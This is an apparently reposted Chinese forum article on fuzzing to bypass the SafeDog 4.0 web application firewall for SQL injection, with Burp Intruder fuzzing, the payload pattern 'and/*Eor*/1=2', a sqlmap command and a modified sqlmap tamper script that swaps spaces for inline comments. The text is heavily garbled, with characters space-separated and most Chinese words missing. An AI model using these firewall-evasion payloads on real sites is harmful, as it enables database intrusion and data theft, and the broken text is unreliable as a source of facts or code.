[15382] 2020-05-17_Fuzz绕过安全狗4.0实现SQL注入

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-05-17_Fuzz绕过安全狗4.0实现SQL注入 F u z z 4 . 0 S Q L   A n u b i s 2 4   F r e e B u f   2 0 2 0 - 0 5 - 1 7 0 × 0 0   使 使 b u r p i n t r u d e r f u z z , s q l m a p t a m p e r 0 × 0 1 w a f 使 使 / * * / 使 使 / ! * * / 0 × 0 2 使 使 / * * / s q l 4 . 0 使 a p a c h e + m y s q l + p h p ( ) 访 s q l
使 / * * / 访 使 b u r p
r e p e a t e r i d 便 便 s q l 使 / * * / 使 s q l
f u z z i n t u d e r
s q l f u z z / E o r / / E o r /
a n d / E o r / 1 = 2 f u z z 使 s q l m a p s q l m a p 使 t a m p e r / c o n c a t 2 c o n c a t w s . p y # ! / u s r / b i n / e n v   p y t h o n 2 " " " C o p y r i g h t   ( c )   2 0 0 6 - 2 0 1 9   s q l m a p   d e v e l o p e r s   ( h t t p : / / s q l m a p . o r g / ) S e e   t h e   f i l e   ' L I C E N S E '   f o r   c o p y i n g   p e r m i s s i o n " " " f r o m   l i b . c o r e . c o m p a t   i m p o r t   x r a n g e f r o m   l i b . c o r e . e n u m s   i m p o r t   P R I O R I T Y _ _ p r i o r i t y _ _   =   P R I O R I T Y . L O W d e f   d e p e n d e n c i e s ( ) :         p a s s
使 p y t h o n 2   s q l m a p . p y   - r   1 . t x t   t a m p e r = s p a c e 2 c o m m e n t s q l d e f   t a m p e r ( p a y l o a d ,   * * k w a r g s ) :         " " "         R e p l a c e s   s p a c e   c h a r a c t e r   ( '   ' )   w i t h   c o m m e n t s   ' / * * / '         T e s t e d   a g a i n s t :                 *   M i c r o s o f t   S Q L   S e r v e r   2 0 0 5                 *   M y S Q L   4 ,   5 . 0   a n d   5 . 5                 *   O r a c l e   1 0 g                 *   P o s t g r e S Q L   8 . 3 ,   8 . 4 ,   9 . 0         N o t e s :                 *   U s e f u l   t o   b y p a s s   w e a k   a n d   b e s p o k e   w e b   a p p l i c a t i o n   f i r e w a l l s         > > >   t a m p e r ( ' S E L E C T   i d   F R O M   u s e r s ' )         ' S E L E C T / * * / i d / * * / F R O M / * * / u s e r s '         " " "         r e t V a l   =   p a y l o a d         i f   p a y l o a d :                 r e t V a l   =   " "                 q u o t e ,   d o u b l e q u o t e ,   f i r s t s p a c e   =   F a l s e ,   F a l s e ,   F a l s e                 f o r   i   i n   x r a n g e ( l e n ( p a y l o a d ) ) :                         i f   n o t   f i r s t s p a c e :                                 i f   p a y l o a d [ i ] . i s s p a c e ( ) :                                         f i r s t s p a c e   =   T r u e                                         r e t V a l   + =   " / * * / "                                         c o n t i n u e                         e l i f   p a y l o a d [ i ]   = =   ' ' ' :                                 q u o t e   =   n o t   q u o t e                         e l i f   p a y l o a d [ i ]   = =   ' " ' :                                 d o u b l e q u o t e   =   n o t   d o u b l e q u o t e                         e l i f   p a y l o a d [ i ]   = =   "   "   a n d   n o t   d o u b l e q u o t e   a n d   n o t   q u o t e :                                 r e t V a l   + =   " / * E o r * / "                                 c o n t i n u e                         r e t V a l   + =   p a y l o a d [ i ]         r e t u r n   r e t V a l
0 × 0 3 / * * / 使 f u z z s q l m a p b u r p * A n u b i s 2 4 F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则